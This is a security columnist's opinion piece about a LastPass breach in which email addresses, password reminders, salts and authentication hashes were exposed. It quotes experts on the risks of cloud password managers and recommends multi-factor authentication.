A week or two ago, a Facebook friend of mine posted how much he loved the cloud-based password manager that he uses and how safe it is. Many others chimed in with similar comments. You just know I’m going to pop up and warn that there are still plenty of security risks with these password manager sites, and there have been incidents where they’ve been breached. I was surprised at the number of people who took me to task and asked me to “prove it.”
I claim no psychic powers, but before I had the chance to go back and find information on past breaches, I began to get emails alerting me that LastPass had been breached. I honestly thought it was such an odd coincidence that my mind was playing tricks on me, and I had to go check again to make sure that my email wasn’t somehow regurgitating three-year-old messages.
Nope. LastPass has been breached. Again. For at least the third time now since 2011. At what point is something an anomaly and at what point is it a trend?
According to eSecurity Planet, here is a brief overview of what exactly happened:
While no LastPass user accounts were accessed and no encrypted user data (stored passwords) was stolen, the company's investigation has determined that LastPass account email addresses, password reminders, server per user salts and authentication hashes were compromised.
I get why people turn to password managers like LastPass. Passwords are cumbersome and frustrating and just so hard to remember, but until we decide on some replacements for passwords, we’re stuck. On the surface, password managers allow us to remember only one password and then have dozens of unique passwords that are recommended for security.
But it is time to stop thinking of password managers as a secure place to store those passwords because, like everything else, they are ripe to be stolen. As Devin Egan, co-founder and CTO of LaunchKey, told me in an email:
Password vaults in the cloud are potentially dangerous as a breach like this could expose every password to every site for a wide range of users. Unlike a site that stores passwords one-way hashed, a password manager encrypts the users' passwords with a way to decrypt them so they can be used later. Thus, LastPass's breached hashes and salts will be under attack and any successful crack could lead to a specific user without additional factors of authentication open to further data breaches.
Unfortunately, password managers lull users into a sense of false security, Ken Westin, senior security analyst at Tripwire, told me. You still need a password to log in and that can be stolen just as easily as any other password.
LastPass advises its customers to use a multi-factor authentication system to access the site, and that’s a good idea – especially since we know that LastPass’s security problems are leaning toward being a trend, and we simply have to recognize that we can’t count on anyone being as secure as we’d like. Not even the sites whose primary purpose is security.
Sue Marquette Poremba has been writing about network security since 2008. In addition to her coverage of security issues for IT Business Edge, her security articles have been published at various sites such as Forbes, Midsize Insider and Tom's Guide. You can reach Sue via Twitter: @sueporemba